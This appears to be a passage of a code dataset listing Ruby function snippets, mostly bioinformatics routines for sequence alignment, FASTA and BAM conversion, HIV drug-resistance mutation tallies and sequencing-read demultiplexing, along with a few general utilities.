\\\n .group(\"prok_group_id\") \\\n .select(\"prok_group_id, sum(weight_pg) as cnt\") \\\n .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\n \n #puts @pgsn_hsh.inspect\n \n \n #exit(0)\n #debug\n #Rails.logger.level = 2 # at any time\n\n\n end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def hit_strand; @genomic.strand; end",
"def exec_range_alpha\n if $run_alpha_range\n puts \"Iterating over range of alpha values. This may take a while...\"\n else\n puts \"Running nCOP with alpha = #{$alpha_range[0]}. Prioritizing genes...\"\n end\n \n aggrStats = RunInfo.new\n \n # for each alpha and beta\n $alpha_range.each do |n|\n start_alp = Time.now\n \n # scale alpha and beta appropriately\n $ALPHA = n.round(4)\n $BETA = ((1 - $ALPHA).to_f/$normalization_const).round(4)\n \n # initialize an empty array for bad starting nodes\n $bad_starting_genes = []\n\n # run it NUM_ITER times\n exec_iter_fixed_alpha aggrStats\n \n puts \" alpha = #{n} done\"\n #puts \"avg iter for $ALPHA = #{n} completed after = #{proper_time_since(start_alp)}\" if $run_alpha_range\n end\n \n # remember the stats\n $aggrStats = aggrStats\n \n puts \"Done.\"\nend",
"def sdrm_rt_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"RT\"\n rf_label = 1\n start_codon_number = 34\n gap = \"AGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCAC\"\n\n n_seq = sequences.size\n mut_nrti = {}\n mut_nnrti = {}\n mut_com = []\n r1_aa = {}\n r2_aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n r1 = seq[0,267]\n r2 = seq[267..-1]\n seq = r1 + gap + r2\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n\n r1_aa[name] = aa_seq[0,89].join(\"\")\n r2_aa[name] = aa_seq[-85..-1].join(\"\")\n nrti = sdrm_nrti(aa_seq,start_codon_number)\n nnrti = sdrm_nnrti(aa_seq,start_codon_number)\n mut_com << (nrti.merge(nnrti))\n\n nrti.each do |position,mutation|\n if mut_nrti[position]\n mut_nrti[position][1] << mutation[1]\n else\n mut_nrti[position] = [mutation[0],[]]\n mut_nrti[position][1] << mutation[1]\n end\n end\n nnrti.each do |position,mutation|\n if mut_nnrti[position]\n mut_nnrti[position][1] << mutation[1]\n else\n mut_nnrti[position] = [mutation[0],[]]\n mut_nnrti[position][1] << mutation[1]\n end\n end\n end\n\n mut_nrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n\n mut_nnrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NNRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n r1_aa_start = 34\n r2_aa_start = 152\n\n r1_aa_size = r1_aa.values[0].size - 1\n r2_aa_size = r2_aa.values[0].size - 1\n\n (0..r1_aa_size).to_a.each do |p|\n aas = []\n r1_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r1_aa_start] = count_aas.sort_by{|_k,v|v}.reverse.to_h\n r1_aa_start += 1\n end\n\n (0..r2_aa_size).to_a.each do |p|\n aas = []\n r2_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r2_aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n r2_aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def averages(grade_hash)\n grade_hash.transform_values { |marks| marks.inject {|sum, n| sum + n } / marks.length }\nend",
"def score_term word, year_hash, year\n min_norm_count = 0.000001\n curr_nc = 0.0\n prev_nc = 0.0\n (year-GROUPSIZE+1).upto(year) do |y|\n begin\n curr_nc += year_hash[y][word][:nc] || 0.0\n rescue\n curr_nc += 0.0\n end\n end\n (year-GROUPSIZE*2+1).upto(year-GROUPSIZE) do |y|\n begin\n prev_nc += year_hash[y][word][:nc] || 0.0\n rescue\n prev_nc += 0.0\n end\n end\n\n if prev_nc > 0.0\n growth = curr_nc / prev_nc\n else\n growth = 0.0\n end\n\n if growth > 1.0\n return growth\n else\n return 1.0\n end\nend",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def align_compressed_reads_to_human_genome_reference_using_bowtie\n\t\tputs \"step 7 align compressed reads to human genome reference using bowtie\"\n\t\tfiles.each_pair do |k,v|\n\t\t\t#\tbowtie's verbose is RIDICULOUS!\n\t\t\t#\tIt prints WAY too much and adds WAY too much time.\n\t\t\t#\t\t\t\t\"--verbose \"<<\n\t\t\tcommand = \"bowtie -n #{bowtie_mismatch} -p #{bowtie_threads} -f \" <<\n\t\t\t\t\"-S #{bowtie_index_human} compress_#{k}lane.fa compress_#{k}lane.sam\"\n\t\t\tcommand.execute\n\t\t\t\"compress_#{k}lane.sam\".file_check(die_on_failed_file_check) #\tthe reads that DIDN'T align?\tNO\n\n\t\t\t\"sam2names.rb compress_#{k}lane.sam bowtie_#{k}lane.names\".execute\n\t\t\t\"bowtie_#{k}lane.names\".file_check(die_on_failed_file_check)\n\t\tend\n\n\t\tpull_reads_from_fastas(\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.names\" },\n\t\t\tfiles.keys.sort.collect{|k| \"compress_#{k}lane.fa\" },\n\t\t\tfiles.keys.sort.collect{|k| \"bowtie_#{k}lane.fa\" })\n\n#\n#\tThis script has fixed input of chopped_leftlane.psl (and right or single)\n#\tBAD. BAD. BAD.\tTODO\n#\tThis is only informative and nothing uses the output\n#\tso could be commented out.\n#\n#\n#\tTODO Replaced with ruby version, but still in development\n#\n#\n#\t\tcommand = \"candidate_non_human.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"bowtie_#{k}lane.names \" }\n#\t\tcommand.execute\n#\t\tfile_check( \"candidate_non_human.txt\" )\n\tend",
"def fitFiles(target)\n buckets()\n runningSize = 0\n fileSet = FileSet.new(target, @log, @DEBUG, @LOG_DEBUG)\n \n # Go thru each bucket...\n @sortedBuckets.each do |bkt|\n Utils.printMux(@log, \"Processing bucket '#{bkt}'\")\n\n # ... And each file in the bucket\n @data[bkt].each do |file| \n Utils.printMux(@log, \"\\tProcessing file '#{file}'\")\n\n # The regular call to size won't work with larger (> 2 GB) files in some versions of Ruby, so call the custom version added above.\n fsize = File.size_big(file)\n\n Utils.printMux(@log, \"\\t\\t fsize: #{fsize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"\\t\\trunningSize: #{runningSize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"\\t\\t target: #{target}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n\n\t\t\t # Sanity check the file size\n if (fsize < 0)\n Utils.printMux(@log, \"\\t\\t*** WARNING: fsize < 0 - skipping!\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n next\n end\n\n # Make sure this file won't push us over the limit\n if (fsize + runningSize) < target\n # take the first file in this bucket \n Utils.printMux(@log, \"\\t\\tAdding '#{file}' and removing from bucket\")\n fileSet.add(file, fsize)\n runningSize += fsize\n \n # Remove the file from the original list\n @data[bkt].delete(file)\n \n # See if we should remove the bucket, too\n if @data[bkt].size() == 0\n @data.delete(bkt)\n Utils.printMux(@log, \"Removed bucket '#{bkt}'\\n\")\n end\n else\n # Go to the next bucket and look at smaller files\n Utils.printMux(@log, \"\\t\\tDropping down to next bucket\\n\")\n break\n end\n\n # Give the CPU a bit of a break in between files\n sleep @sleepInterval\n end # iterate files\n\n # Give the CPU a bit of a break in between buckets\n sleep @sleepInterval\n end # iterate buckets\n \n # Save off the running size in the object\n @totalSize = runningSize\n \n # Save off the file set\n @fileSets << fileSet\n\n Utils.printMux(@log, \"totalSize: #{totalSize}\\n\", @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n Utils.printMux(@log, \"fileSets:\\n\" + @fileSets.pretty_inspect(), @DEBUG, @LOG_DEBUG, Utils::DEBUG_LOW, Utils::LOG_LOW)\n\n return fileSet\n end",
"def runAnalyzer(num_samples,inhash)\n # select profile for run\n show do \n title \"Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}\" # this is just a profile name, should be ok for other polymerases\n note \"Click <b>Back to Wizard</b> if previous data is displayed.\"\n check \"Under <b>Process -> Process Profile</b>, make sure <b>#{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}</b> is selected.\"\n end\n \n # select alignment marker\n ref_marker = (inhash[:sampleTypes] == 'DNA') ? REF_MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] : REF_MARKERS[inhash[:type_ind] ]\n show do \n title \"Select alignment marker\"\n check \"Under <b>Marker</b>, in the <b>Reference Marker </b> drop-down, select <b>#{ref_marker}</b>. A green dot should appear to the right of the drop-down.\"\n end\n \n # empty rows\n if inhash[:sampleTypes] == 'RNA'\n num_samples = num_samples + 1 # Include the ladder in the first well of the first stripwell\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n (num_samples % WELLS_PER_STRIPWELL) > 0 ? nonempty_rows + 1 : nonempty_rows\n else\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n end\n show do \n title \"Deselect empty rows\"\n check \"Under <b>Sample selection</b>, deselect all rows but the first #{nonempty_rows}.\"\n end\n \n # check \n show do \n title \"Perform final check before running analysis\"\n note \"Under <b>Run Check</b>, manually confirm the following:\"\n check \"Selected rows contain samples.\"\n check \"Alignment marker is loaded (changed every few weeks).\"\n end\n \n # run and ask tech for remaining number of runs\n run_data = show do \n title \"Run analysis\"\n note \"If you can't click <b>Run</b>, and there is an error that reads <b>The pressure is too low. Replace the nitrogen cylinder or check the external nitrogen source</b>, close the software, and reopen it. Then restart at title - <b>Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]} </b>\"\n check \"Otherwise, click <b>Run</b>\"\n note \"Estimated time of experiment is given at the bottom of the screen\"\n get \"number\", var: \"runs_left\", label: \"Enter the number of <b>Remaining Runs</b> left in this cartridge\", default: 0\n #image \"frag_an_run\"\n end\n \n # return\n run_data[:runs_left]\n \n end",
"def gcThree #average gc 3 values for seqs\n freqs = Array.new\n self.codons.each{ | eachRow |\n gcCount = 0\n codonCount = 0\n eachRow.each{ |eachCodon |\n if ! (eachCodon.include?(\"N\") or eachCodon.include?(\"-\"))\n codonCount += 1\n if eachCodon[2,1] =~ /[GC]/\n gcCount += 1\n end\n end\n }\n\n if codonCount != 0\n freqs << gcCount.to_f / codonCount\n end\n }\n\n\n return freqs.sampleMean\n end",
"def compute\n index(@ref, @ref_base, @software)\n align(@ref, @ref_base, @software, {seedlen: @seedlen})\n end",
"def getFtsSequences\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n loc = \"c#{ft.locations[0].to_s}\" if ft.locations[0].strand == -1\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\nend",
"def fully_extend_all reps=nil\n dist.branches.times do |i|\n hits = mapee(i).hits\n len = mapee(i).length\n mapee(i).clear_hits\n reps = (@len.to_f / len).round if reps.nil?\n mapee(i).length = @len\n reps.times do |j|\n new_hits = HitSq.new\n new_hits << hits\n new_hits * (1.0/reps)\n new_hits + (j.to_f / reps)\n# puts new_hits.hits.inspect\n mapee(i) << new_hits\n end\n# puts mapee(i).hits.hits.inspect\n end\n end",
"def bam_get_cigar(b)\n b[:data] + b[:core][:l_qname]\n end",
"def calc_wps(o = {})\n max_distance = o[:max_distance] || MAX_DISTANCE\n w1 = @t1.w_cnt ; w2 = @t2.w_cnt \n @i = 0 ; @j = 0 ; g_score = []; w1_iso = 0 ; w2_iso = 0\n # Until we exhause occurrence of both terms\n # Always start with a new group (b_loc/b_term)\n begin\n while true\n #At this point, which term do we have and where?\n b_term , b_loc = get_term_loc(w1[@i] , w2[@j])\n #What is current term and where?\n c_term , c_loc = get_next_term_loc(b_term , w1 , w2)\n\n if( c_loc - b_loc > max_distance || b_term == c_term || !in_same_doc?(b_loc , c_loc) )\n #puts \"Moving on (#{b_term}::#{b_loc} -> #{c_term}::#{c_loc})\"\n if b_term == 1 then w1_iso += 1 else w2_iso += 1 end\n next\n end\n \n n_term , n_loc = get_next_term_loc(c_term , w1 , w2)\n # c_term - n_term group\n if n_term != c_term && n_loc - c_loc < c_loc - b_loc\n g_score << n_loc - c_loc \n #puts \"C3-1 G#(#{c_term}::#{c_loc} ~ #{n_term}::#{n_loc}) : #{g_score.last}\"\n nn_term , nn_loc = get_next_term_loc(n_term , w1 , w2)\n if c_term == 1 then w1_iso += 1 else w2_iso += 1 end\n else # b_term - c_term group\n g_score << c_loc - b_loc \n #puts \"C3-2 G#(#{b_term}::#{b_loc} ~ #{c_term}::#{c_loc}) : #{g_score.last}\"\n end\n end#while\n rescue IndexError\n #puts \"Process ended @ (#@i,#@j) / #{w1_iso} , #{w2_iso}\"\n end#begin\n g_score.inject(0){|sum,e| sum + 1.0 / e if e > 0} #) / Math.exp(w1_iso * w2_iso) \n end",
"def align\n i = @max_cell_row\n j = @max_cell_column\n @first_result = \"\" \n @second_result = \"\" \n gaps_in_first = 0 # count of gaps in each sequence\n gaps_in_second = 0\n\n while true\n\n # end local alignment at 0 cell\n if @traceback_matrix[i, j] == 0\n break\n end\n\n # match/mismatch\n if @traceback_matrix[i, j] == 1\n @first_result << @first_string[i-1]\n @second_result << @second_string[j-1]\n i -= 1\n j -= 1\n end\n\n # deletion -> gap in S1\n if @traceback_matrix[i, j] == 2\n @first_result << \"-\"\n @second_result << @second_string[j-1]\n j -= 1\n gaps_in_first += 1\n end\n\n # insertion -> gap in S2\n if @traceback_matrix[i, j] == 3\n @first_result << @first_string[i-1]\n @second_result << \"-\"\n i -= 1\n gaps_in_second += 1\n end\n\n end\n # set variables to make writing to file prettier\n set_variables(gaps_in_first, gaps_in_second)\n end",
"def before_results(controller_params)\n @num_seqs = 0\n\n resfile = File.join(job_dir, jobid+\".aln\")\n raise(\"ERROR with resultfile!\") if !File.readable?(resfile) || !File.exists?(resfile) || File.zero?(resfile)\n res = IO.readlines(resfile).map {|line| line.chomp}\n\n # get the header\n @header = res.shift\n\n #get the alignment blocks\n @aln_blocks = []\n block = []\n num = 0\n res.each do |line|\n if (line =~ /^\\s*$/)\n if (!block.empty?)\n @aln_blocks.push(block)\n block = []\n if (@num_seqs == 0) then @num_seqs = num end\n num = 0\n end\n next\n end\n\n if (line !~ /^\\s+/) then num += 1 end\n block.push(line)\n end\n\n if (!block.empty?)\n @aln_blocks.push(block)\n end\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def run_nCOP_given_alpha selected_alpha = $alpha\n # use the given alpha\n $alpha_range = ([] << selected_alpha.to_f.round(2))\n \n # set the rest of the params\n $NUM_AVG_ITER = 1000\n $run_alpha_range = false\n \n $all_avail_genes = deep_copy_hash $all_genes\n $all_avail_pat = deep_copy_hash $all_pat\n \n # randomly withhold 15% of the patients\n $HIDE_PERCENT = 0.15\n \n exec_range_alpha\n \n # write the genes sorted by their frequency\n puts \"Writing output to: #{$OUT_DIR}#{$cancer}_results.txt\"\n genes = sort_hash($selected_genes)\n fo = File.open(\"#{$OUT_DIR}#{$cancer}_results.txt\", 'w')\n genes.each { |e| fo.puts \"#{e.ljust(10)} #{($selected_genes[e].to_f*100/$NUM_AVG_ITER).round(1)}%\" }\n puts \"Done.\"\nend",
"def mean_sqr_err(expected)\n len = [length, expected.length].min\n sum = (0...len).reduce 0 do |sum, i|\n o = (self[i].ord - A) / 25.0\n e = (expected[i].ord - A) / 25.0\n sum + (o - e)**2\n end\n sum / len\n end",
"def bucket_sort\n buckets = {}\n #Ideal for known and uniformly distributed range. Sort age of employees for eg.:\n @array.each do |age|\n bucket = age/10\n buckets[bucket] ||= []\n buckets[bucket] << age\n end\n\n result = []\n for i in 0..20\n arr = buckets[i]\n puts \"i=#{i}, buckets[i]=#{arr}\"\n puts \"result=#{result}, sorted value=#{insertion_sort(arr)}\" if arr\n result << insertion_sort(arr) if arr && arr != []\n end\n @array = result.flatten\n end",
"def score(do_logging=false)\n # penalize really short or long phrases\n duration_penalty = case \n when duration >= 4 then 0\n when duration == 3 then -100\n when duration == 2 then -400\n when duration <= 1 then -800\n end\n duration_penalty += case \n when length >= 12 then -1*((length*4)**1.25)\n when (length >= 3 and length < 12) then 0\n when length == 2 then -150\n when length <= 1 then -400\n end\n total = duration_penalty\n\n # first penalize for the total distance\n total -= DIST_WEIGHT*total_distance\n\n # now add a premium for similarity to other phrases\n filtered_similarity = @phrase_similarity.select{ |x| x > 0.3 }\n if filtered_similarity.empty?\n similarity = 0.0\n mean_similarity = 0.0\n similarity_weight = 0\n else\n mean_similarity = filtered_similarity.inject(0.0){|s,x| s+x} / filtered_similarity.length.to_f\n similarity = (self.length**SIM_A) * (filtered_similarity.length**SIM_B) / (10.0**(SIM_C*mean_similarity)) \n similarity_weight = 2\n total += similarity_weight*similarity\n end\n\n # finally, subtract a penalty for being significantly different from the mean phrase length\n total -= DUR_DEV_WEIGHT*duration_deviance\n\n puts \"\\t\\tscore (#{sprintf(\"%2d\", @start_idx)}-#{sprintf(\"%2d\", @end_idx)}): #{sprintf(\"% 4d\", duration_penalty)} \" +\n \"- #{DIST_WEIGHT}*#{sprintf(\"%5.1f\", total_distance)} \" +\n \"+ #{similarity_weight}*((#{sprintf(\"%2d\", self.length)}^#{SIM_A.round})*(#{filtered_similarity.length}^#{SIM_B.round})\" + \n \"/(10.0^(#{SIM_C.round}*#{sprintf(\"%4.3f\", mean_similarity)}))) \" +\n \"- #{DUR_DEV_WEIGHT}*#{sprintf(\"%5.3f\", duration_deviance)} \" +\n \"= #{sprintf(\"% 4d\", duration_penalty)} \" +\n \"- #{sprintf(\"% 6.1f\", DIST_WEIGHT*total_distance)} \" +\n \"+ #{sprintf(\"% 7.3f\", similarity_weight*similarity)} \" +\n \"- #{sprintf(\"% 6.1f\", DUR_DEV_WEIGHT*duration_deviance)} \" +\n \"= #{sprintf(\"% 6.1f\", total)}\" if do_logging\n\n return total\n end",
"def test_alignment_works_in_single_thread\n assert_nothing_raised(\"Can't handle single threaded scenario\") do\n SEQUENCE_GROUPS[0..10].each do |sequence_group|\n align_group(sequence_group)\n end\n end\n end",
